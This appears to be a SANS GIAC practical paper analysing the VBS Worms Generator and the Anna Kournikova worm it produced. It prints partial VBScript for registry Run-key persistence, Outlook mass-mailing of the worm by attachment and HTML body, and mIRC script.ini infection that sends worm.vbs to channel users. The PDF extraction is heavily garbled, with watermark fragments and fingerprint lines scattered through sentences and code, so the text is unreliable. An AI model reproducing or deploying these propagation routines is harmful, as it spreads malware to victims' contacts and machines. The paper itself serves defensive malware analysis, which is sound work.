Vbs Worms Generator - 451
Vbs Worms Generator - 451
Introduction
s.
ht
The “VBS Worms Generator” ( from now on vbswg) is a worm generator for
rig
Window s w ritten by a 17 years o ld boy whose name is [K]Alamar [1]. W ith
the words “w orm generator” we mean a software tool w hich is able to
ull
generate customisable virus code.
f
This software, in particular, lets the creator customize most of the aspects of
ns
Key the behaviours
fingerprint of the
= AF19 FA27virus.
2F94However,
998D FDB5 a single
DE3Dskeleton is used
F8B5 06E4 A169w4E46
it h many
tai
plug-in s. The user can choos e which ones to activate.
re
This tool is particularly infamous because it w as the one used at the
or
beginning of February 2001 to create the “AnnaKournicova worm” [2] which
in a few days managed to infect thousands of computers worldwide. The
th
worm was generat ed by a 20 year old man w ho goes by the name of
Au
OnTheFly who didn’t realize the damage he was about to inflict: he could now
be facing a prison sentence of up to four years [3].
2,
00
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Here is a list of all the possible features:
• Start w ith Windows (by registry key): the worm will be activ ated every
time W indows starts
• Worm backup : a copy of the worm’s code w ill be copied in a safe
s.
location on the victim’s machine
ht
• Outlook replic ation : this is the mechanism the virus w ill use to spread
rig
itself by email. Two options are available: to send attachments or to
send HTML code with the virus embedded
• Mirc replic ation : the Mirc in itialisation file (mirc.ini) is altered in order to
ull
spread the worm by IRC
f
• Pirch replication: same principle used by the Mirc replication but the
ns
Pirch= initialisation
Key fingerprint AF19 FA27 file is changed
2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
tai
• Other files infected : a search on all the disks (network drives inc luded)
will be performed and the worm will overw rit e it self onto all the files
re
with extension .vbe and .vbs. It will also search for the files mirc.ini
or
and pirch.ini in order to detect installations of Mirc and Pirch
• Payloads: it is possible to add some actions to be performed by the
th
virus on a specific date: display a message with a p icture in an alert
Au
box, open a web page or crash the system using two different
methods.
2,
• Anti deletion method : the worm becomes memory resident and the
00
Let’s examine in details now the source code gen erated by vbsw g for some of
In
the sections.
NS
All the code generated by this tool is encrypted in a very simple but effective
form (unless the strong encryption is chosen): all the names of variables and
SA
functions are randomly generated and the strings are in itia lised w ith
concatenations of the ASCII values of the characters. This makes it more
©
difficult to debug and understand what the code does for an inexperienced
person.
In the examples shown here all the variable s are in cle ar text and the registry
keys are show n w ith their p roper names although I have omitted few lines of
Key code substituting
fingerprint = AF19them
FA27w2F94
it h some comments
998D (marked
FDB5 DE3D F8B5in06E4italicA169
s). 4E46
© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Start with Windows
Set ws = C reateObj ect( "WScript .She ll")
ws.reg writ e "HKLM\ SOFT WARE \Mic roso ft \Windo ws \C urrentVe rsio n \",
"Run \{r egke y} ","wsc ript .exe c: \ wind ows \{wor m} .v bs %"
s.
ht
This code create a registry key whose value is executed every time w indows
rig
is started. The name of the registry key and the name of the file executed are
parametric and decided by the “attack er” (which is generating the worm).
ull
Outlook replication by attachment
f
ns
Key fingerprint = AF19
Functi FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
on O utlook()
tai
On Er ror Resume N ext
Set O utlo okApp = Crea teObject ("Ou tlook.Ap plic ation")
re
If Ou tloo kApp = " Outl ook" The n
Set Mapi = Outlo okAp p.GetNam eSpa ce("MAPI ")
or
set mapi adl ist a s Ma pi.Addre ssLi sts
For Each Address list In map iadl ist
th
If Addr esslist. Addr essEntri es.C ount <> 0 Th en
Au
Ad dres slistcou t = Addressl ist. AddressE ntri es.Count
Fo r Ad dList = 1 To Address list cout
S et m sg = Out look App.Crea teIt em(0)
2,
S et A dEntries = A ddressli st.A ddressEn trie s(AddLis t)
00
Ne xt
tu
registry .reg write "H KCU \ software \myw orm \mail ed", "1"
End If
sti
Next
In
End I f
End Fu ncti on
NS
all the people in the addres s-book of the victim’s computer. At first it is
checked to ensure that there is at least one recipient in the address -book and
©
then a new message is created with subject and body which is decided by the
“attacker”.
Attached to this mail there is a copy of the worm itself and the copies of the
message just sent are deleted in order to remove any track of the action
taken.
Key Afingerprint = AF19
registry key FA27
is also 2F94to
created 998D
keepFDB5
trackDE3D
if the F8B5 06E4
virus has A169 4E46
already been sent
by email. Doing a comparison with the routine used by the “Love Letter” virus
it is possible to say that this one is less sophistic ated because it doesn’t keep
track of the new additions to the address -book, once mailed the virus is not
sent anymore.
© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Outlook Replication by HTML
Functi on O utlookBo dy()
On Er ror Resume N ext
Set f so = CreateO bjec t("scrip ting .filesys temo bject")
s.
Set O utlo ok = Cre ateO bject("O utlo ok.Appli cati on")
ht
If Ou tloo k = "Out look " Then
Set Myse lf = fso .ope ntextfil e(ws cript.sc ript fullname , 1)
rig
I = 1
Do W hile Myself. aten dofstrea m = False
ull
MyL ine = Myself .rea dline
Cod e = Code & C hr(3 4) & " & vbc rlf & " & Ch r(34) &
f
Replace( MyLi ne, Chr( 34), Chr(34) & " &chr(34) &" &
ns
Chr(34))
Key Loop
fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
tai
Myse lf.C lose
re
Lots o f li nes of c ode to creat e an HTML pa ge w hich
contai ns t he sourc e co d e of th e wo rm. The vari able is
or
called Htm lBody
th
Set mapi = Outlo ok.G etNameSp ace( "MAPI")
Set Mapi add=mapi .Add ressList s
For Each Address list In Mapi add
Au
If Addr esslist. Addr essEntri es.C ount <> 0 Th en
2,
Ad dCou nt = Add ress list.Add ress Entries. Coun t
00
Msg. BCC = Ms g.BC C & "; " & A ddentry. Addr ess
tu
E nd I f
Ne xt
sti
Ms g.se nd
End If
In
Next
Outl ook. Quit
NS
End I f
End Fu ncti on
SA
This function creates and sends a new email message to all the recipients in
©
the address book. The subjec t is parametric while the body is an HTML page
wit h a copy of the worm itself which is executed on the victim’s computer as
soon as he tries to preview or open the email.
The worm will then be executed if the victim will allow the ActiveX to be
executed o n his machine.
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Mirc replication
Functi on M irc(Path )
On Er ror Resume N ext
Set f so = CreateO bjec t("scrip ting .filesys temo bject")
s.
Set w s = CreateOb ject ("wscrip t.sh ell")
ht
If Pa th = "" Then
If f so.f ileexist s("c : \mirc \m irc. ini") Th en
rig
Pat h = "c: \mirc "
End If
ull
If f so.f ileexist s("c : \mirc32 \mir c.ini") Then
Pat h = "c: \mirc 32"
f
End If
ns
PfDi r=ws .regread ("HK EY_LOCAL _MAC HINE \Sof twar e \Micros oft \ Windo
Key ws\Cur
fingerprint rent Version
= AF19 \ Prog
FA27 2F94 ramFiles
998D FDB5 Dir" )
DE3D F8B5 06E4 A169 4E46
tai
If f so.f ileexist s(Pf Dir & " \ mirc \mirc.in i") Then
Pat h = PfDir & " \mi rc"
re
End If
End I f
or
If Pa th < > "" The n
Set Scri pt = fso .Cre ateTextF ile( Path & " \scr ipt.ini" , Tr ue)
th
Scri pt.w riteline "[s cript]"
Au
Scri pt.w riteline "n0 =on 1:JO IN:# :{"
Scri pt.w riteline "n1 = /if ( $ni ck == $m e ) { halt } "
Scri pt.w riteline "n2 = / ." & chr (100) & chr( 99) & ch r(99 ) &
2,
" s end $nic k c: \windows \wor m.vbs"
00
End I f
End Fu ncti on
00
This routine checks the existence of the Mirc software on the victim’s machine
20
and it changes the initi alisation script in order to infect other users on Irc. To
check if the softw are is installed, it checks the existence of the initialisation
te
files in two directories and in a registry key. If the file exists, a new file called
tu
“script.ini” is created: this file will send the worm to every Irc channels the
sti
Antideletion method
SA
© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
If the creator chooses to activate this add -on, this w ill be the last function
called by the work because it never ends. The w orm w ill enter into an infinite
loop checking continuously if the source code is st ill on the disk: if it is
deleted, it recreates itself.
s.
ht
Main()
rig
The main section of the worm is the one responsible to set -up the global
ull
variable s, save the first copy of the worm on the victim’s file system and call
all the other functions. All the names of the variables and functions are
f
randomly generated by the vbswg and the length is parametric.
ns
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
tai
Conclusion
re
or
Now adays this virus is detected by most of the well -know n antivirus softw are
th
but for few days, when the antivirus companies where updating their
signatures, it was a real threat. Vbswg is also detected by most of the AV
Au
software as Trojan.
2,
Again, users have to be educated to use the e -mail service: this can be
00
enforced by company polic ies for what concerns w ork places and it could be
-2
Sources
tu
sti
http://virii. at/k/
NS
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_KALA
MAR.A
©
[3] “Man arrested over Kournikova virus”, 14 Feb 2001 – BBC World Service
http://new s.bbc.co.uk/hi/english/w orld/europe/new sid_1170000/1170176.stm
© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.